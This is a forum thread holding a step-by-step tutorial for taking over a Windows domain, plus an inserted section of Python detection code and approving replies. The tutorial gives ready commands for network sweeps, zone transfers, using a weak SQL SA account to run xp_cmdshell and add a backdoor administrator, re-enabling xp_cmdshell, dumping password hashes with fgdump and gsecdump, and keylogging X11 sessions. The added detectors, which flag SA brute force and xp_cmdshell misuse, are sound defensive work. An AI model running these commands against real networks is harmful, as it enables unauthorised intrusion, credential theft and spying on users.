Thanks for the tutorial williamc. Officially though I have to move it to general IT because it is not based on backtrack. Nothing personal I'm just following the rules.
This tutorial will demonstrate how to gain Domain Administrator on a typical Windows intranet through common security oversights. Most of these tools are Windows based, but may run in Wine. Please post if you can verify this, or if you know a Linux equivalent tool.
Discovery
Obviously start with the network you've been DHCP'd.
NET VIEW command
Displays a list of computers in a specified workgroup or the shared resources available on a specified computer.
Code:
NET VIEW [\\computername [/CACHE] | /DOMAIN[:domainname]]
NET VIEW /NETWORK:NW [\\computername]
Domain Zone Transfers
Starting with the DNS servers you DHCP'd with, try zone transfers. If successful, extrapolate Class C (/24) networks from the individual IP addresses.
Code:
dig @ns1.example.com example.com axfr
Nmap scanning
Perform a ping sweep of the network range.
Clean up the ping sweep.
Code:
nmap -sP -v xx.xx.xx.xx/24 > ping_results.txt
Generate an IP list from the known net ranges.
Code:
cat ping_results.txt | grep -i 'up' | cut --delimiter=" " -f 2 > ping_results_final.txt
gping may be found here:
http://forums.remote-exploit.org/showthread.php?t=11988
Code:
gping xx.xx.0.255 >> iplist.txt
Exploitation
SQL Discovery and Exploitation
A common entry point to a network is through unsecure SQL servers. SQLPing 3.0 performs both active and passive scans of your network in order to identify all of the SQL Server/MSDE installations in your enterprise. It also adds brute-force password capabilities and the ability to brute-force multiple instances.
It can be found here:
http://www.sqlsecurity.com/Tools/Fre...5/Default.aspx
Once you have found a weak SA account, use the command-line OSQL tool found bundled with MSDE. This is the syntax to create an account and promote it to a local administrator:
osql -S %servername% -U %username% -P %password% -t 15 -b -Q "xp_cmdshell 'net user pwnd pwndABC123 /add'"
osql -S %servername% -U %username% -P %password% -t 15 -b -Q "xp_cmdshell 'net localgroup administrators pwnd /add'"
With newer releases of SQL, you may find that the xp command shell has been disabled. Thoughtfully, Microsoft allows you to re-enable this feature!
osql -S %servername% -U %username% -P %password% -t 15 -b -Q "EXEC sp_configure 'show advanced options', 1"
osql -S %servername% -U %username% -P %password% -t 15 -b -Q "EXEC sp_configure 'xp_cmdshell', 1"
As a local administrator, you can now dump the HASHES for the local workstation. Use FGDump, found here:
http://swamp.foofus.net/fizzgig/fgdump/downloads.htm
Syntax:
fgdump -h %hostname% -u pwnd -p pwndABC123
If FGDump doesn't work, try GSECDump, found here:
http://www.truesec.com/PublicStore/c...ookieSupport=1
GSECDump should be used with psexec, found here:
http://technet.microsoft.com/en-us/s.../bb897553.aspx
Syntax:
psexec \\%hostname% -u pwnd -p pwndABC123 -s -f -c gsecdump.exe -s
X11 exploitation
If your nmap scans reveal port 6000-6005 being open, chances are you may be dealing with the X11 protocol (X Windows). X11 is plain-text and can be keylogged and remotely viewed. You will need the NSAT (Network Security Analysis Tool) which can be found here:
http://forums.remote-exploit.org/showthread.php?t=12312
You may find that the tool does not complete a make. Download my fixed version towards the bottom of the post.
Filter your nmap results to only show ports 6000-6005 and copy the results into a text file. NSAT will scan the hosts in this text file. Syntax:
nsat -C nsat_X.conf -n -f iplist.txt
The results should show something similar to this:
[port] 10.1.1.1 - X Windows
[port] 10.1.1.2 - dumpable/sniffable
Target the IPs that are "dumpable/sniffable" with XSpy, found here:
http://www.acm.vt.edu/~jmaxwell/programs/xspy/xspy.html
Syntax:
./xspy 10.1.1.2:0
You should now be keylogging this session. If you want to view the actual desktop of the user, use xwatchwin, found here:
ftp://ftp.x.org/contrib/utilities/
Syntax:
./xwatchwin 10.1.1.2:0
FTP exploitation
Utilizing NSAT, filter your nmap results for port 21. Take this IP list and run it through NSAT.
Syntax:
nsat -C nsat_FTP.conf -n -f iplist.txt
The results should show something similar to this:
10.1.1.1 - anonymous login
10.1.1.2 - anonymous login
Share Enumeration
A common security flaw occurs when users define file shares with lax security, allowing unauthorized users to see sensitive files. ShareEnum looks for these open shares on the network. You can find it here:
http://www.microsoft.com/technet/sys...shareenum.mspx
NetworkSleuth is a network file searching utility that allows you to quickly locate files across a network. You can search for specific file names or for specific file types (e.g. files named/containing "password"). Get it here:
http://www.nsauditor.com/network_sleuth.html
I hope this helps some of you with your pen-testing endeavors. Please add to this tutorial with your own methodologies.
William
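The SQL Server entry point described in the tutorial (SA password found by brute force, then xp_cmdshell switched back on with sp_configure) leaves a recognisable trail in the instance's ERRORLOG. The script below is an added example written for this thread; it is not part of williamc's post or of any tool it links. It parses constructed ERRORLOG lines and raises three kinds of alert: a burst of failed logins for one account from one client, a successful login from that same client after the burst, and a configuration option such as xp_cmdshell being enabled. The message wording follows SQL Server's ERRORLOG format, but the hosts, accounts, times and the alert thresholds are assumptions. Successful logins only reach the ERRORLOG if the instance's login auditing is set to record both failed and successful logins, so the second alert depends on that setting.

```python
"""Detect SA brute force and xp_cmdshell enabling in SQL Server ERRORLOG lines.

Added example, not code from the thread. SAMPLE_LOG is a constructed excerpt:
the message formats mimic SQL Server, the hosts and times are invented.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample ERRORLOG excerpt (not real data).
SAMPLE_LOG = """\
2009-03-02 10:14:01.12 Logon       Error: 18456, Severity: 14, State: 8.
2009-03-02 10:14:01.12 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.1.1.50]
2009-03-02 10:14:01.45 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.1.1.50]
2009-03-02 10:14:01.80 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.1.1.50]
2009-03-02 10:14:02.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.1.1.50]
2009-03-02 10:14:02.33 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.1.1.50]
2009-03-02 10:14:02.60 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 10.1.1.50]
2009-03-02 10:15:40.01 spid52      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2009-03-02 10:15:40.20 spid52      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2009-03-02 11:02:15.00 Logon       Login failed for user 'reports'. Reason: Password did not match that for the login provided. [CLIENT: 10.1.1.7]
"""

# ERRORLOG line: timestamp, source column (Logon, spidNN, ...), message.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+(?P<src>\S+)\s+(?P<msg>.*)$"
)
FAILED_RE = re.compile(r"Login failed for user '(?P<user>[^']+)'.*\[CLIENT: (?P<client>[^\]]+)\]")
SUCCESS_RE = re.compile(r"Login succeeded for user '(?P<user>[^']+)'.*\[CLIENT: (?P<client>[^\]]+)\]")
CONFIG_RE = re.compile(r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)")

# sp_configure options that hand a database login a foothold on the host OS.
DANGEROUS_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures", "Ad Hoc Distributed Queries"}


def parse(log_text):
    """Yield (timestamp, source, message) for each well-formed ERRORLOG line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S")
        yield ts, m.group("src"), m.group("msg")


def detect(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return a list of (kind, timestamp, detail) alerts found in the log."""
    alerts = []
    recent = defaultdict(deque)  # (user, client) -> failure timestamps inside the window
    sprayed = set()              # (user, client) pairs already flagged as brute force
    for ts, _src, msg in parse(log_text):
        f = FAILED_RE.search(msg)
        if f:
            key = (f["user"], f["client"])
            q = recent[key]
            q.append(ts)
            while q and ts - q[0] > window:   # slide the window forward
                q.popleft()
            if len(q) >= threshold and key not in sprayed:
                sprayed.add(key)
                alerts.append(("BRUTE_FORCE", ts,
                               f"{len(q)} failed logins for '{key[0]}' from {key[1]} within {window.seconds}s"))
            continue
        s = SUCCESS_RE.search(msg)
        if s and (s["user"], s["client"]) in sprayed:
            alerts.append(("BRUTE_FORCE_SUCCESS", ts,
                           f"login succeeded for '{s['user']}' from {s['client']} after failure burst"))
            continue
        c = CONFIG_RE.search(msg)
        if c and c["opt"] in DANGEROUS_OPTIONS and c["new"] != "0":
            alerts.append(("DANGEROUS_CONFIG", ts, f"'{c['opt']}' enabled ({c['old']} -> {c['new']})"))
    return alerts


if __name__ == "__main__":
    for kind, ts, detail in detect(SAMPLE_LOG):
        print(f"{ts:%Y-%m-%d %H:%M:%S} {kind}: {detail}")
```

On the constructed excerpt this yields three alerts: the five-failure burst for 'sa' from 10.1.1.50, the success from the same client immediately after, and xp_cmdshell going from 0 to 1. The single failure for 'reports' stays below the threshold. The 'show advanced options' change is deliberately not alerted on its own because it is also toggled in legitimate administration; the option that matters is the one that follows it.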
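The next step in the post, xp_cmdshell running net user /add and net localgroup administrators /add, is visible from the Windows side as a cmd.exe child of sqlservr.exe (Sysmon event ID 1) followed by Security event 4720 (a user account was created) and 4732 (a member was added to a security-enabled local group). The correlation below is an added example for this thread, not code from williamc's post or from Sysmon; it runs over constructed event records whose field names follow those event IDs (ParentImage, Image, SubjectUserName, TargetUserName, MemberName) while the hosts, accounts and times are invented, and the ten-minute window is an assumption.

```python
"""Correlate Sysmon and Security events for the 'SQL Server -> new local admin' chain.

Added example, not code from the thread. EVENTS is a constructed sample; the
field names follow Security 4720/4732 and Sysmon 1, everything else is invented.
"""
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry).
EVENTS = [
    {"time": "2009-03-02 10:16:02", "host": "WKS-042", "source": "Sysmon", "id": 1,
     "ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe",
     "Image": r"C:\Windows\System32\cmd.exe"},
    {"time": "2009-03-02 10:16:03", "host": "WKS-042", "source": "Security", "id": 4720,
     "SubjectUserName": "SQLSERVICE", "TargetUserName": "pwnd"},
    {"time": "2009-03-02 10:16:05", "host": "WKS-042", "source": "Security", "id": 4732,
     "SubjectUserName": "SQLSERVICE", "MemberName": "pwnd", "TargetUserName": "Administrators"},
    # Benign: helpdesk creates a user and grants RDP, not admin.
    {"time": "2009-03-02 14:30:00", "host": "WKS-017", "source": "Security", "id": 4720,
     "SubjectUserName": "helpdesk.admin", "TargetUserName": "jsmith"},
    {"time": "2009-03-02 14:31:10", "host": "WKS-017", "source": "Security", "id": 4732,
     "SubjectUserName": "helpdesk.admin", "MemberName": "jsmith", "TargetUserName": "Remote Desktop Users"},
    # Benign: a user opening a command prompt from the desktop.
    {"time": "2009-03-03 09:00:00", "host": "WKS-017", "source": "Sysmon", "id": 1,
     "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\cmd.exe"},
]

SHELLS = {"cmd.exe", "powershell.exe"}
# Server processes that have no business spawning an interactive shell.
SERVER_PROCESSES = {"sqlservr.exe"}


def _ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")


def _basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events, window=timedelta(minutes=10)):
    """Return (kind, host, detail) alerts for the events, processed in time order."""
    alerts = []
    created = {}  # (host, account) -> time the account was created (event 4720)
    for e in sorted(events, key=_ts):
        if e["source"] == "Sysmon" and e["id"] == 1:
            parent, child = _basename(e["ParentImage"]), _basename(e["Image"])
            if parent in SERVER_PROCESSES and child in SHELLS:
                alerts.append(("SERVICE_SPAWNED_SHELL", e["host"], f"{parent} -> {child}"))
        elif e["source"] == "Security" and e["id"] == 4720:
            created[(e["host"], e["TargetUserName"].lower())] = _ts(e)
        elif e["source"] == "Security" and e["id"] == 4732:
            # In 4732 the group is TargetUserName and the added account is MemberName.
            t0 = created.get((e["host"], e["MemberName"].lower()))
            if e["TargetUserName"].lower() == "administrators" and t0 is not None and _ts(e) - t0 <= window:
                delta = int((_ts(e) - t0).total_seconds())
                alerts.append(("NEW_LOCAL_ADMIN", e["host"],
                               f"'{e['MemberName']}' created by {e['SubjectUserName']} "
                               f"and added to Administrators within {delta}s"))
    return alerts


if __name__ == "__main__":
    for kind, host, detail in detect(EVENTS):
        print(f"{host} {kind}: {detail}")
```

On the sample this flags WKS-042 twice (sqlservr.exe spawning cmd.exe, then 'pwnd' created and added to Administrators three seconds later) and stays quiet on WKS-017. The chain in the tutorial only works because the SQL Server service account is itself a local administrator; running the service under a low-privilege account and leaving xp_cmdshell disabled breaks it even when the SA password is weak, and either of the two alerts above is a strong signal on its own.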
Thanks for the tutorial
Ran across this, nice job thanks.
Updated. Now you can use xp command shell on newer SQL installations that have it disabled by default.
Very nice work, brother. It's good to see that knowledge isn't just being hoarded for personal gain, but is being shared for all the right reasons. Neophytes take heed: this is the kind of example you, and even those of us more versed in the security realm, should all follow.
I look forward to any and everything else you have to offer.
"The goal of every man should be to continue living even after he can no longer draw breath."
~ShadowKill
Dude...
Thanks for sharing, well written tuts like this have me just itching to try out some new tools.
Time to break my home network, again...
TT
Nice work williamc. SQLPing looks interesting.
I added a section on gsecdump to the password cracking guide.
I like the bleeding edge, but I don't like blood loss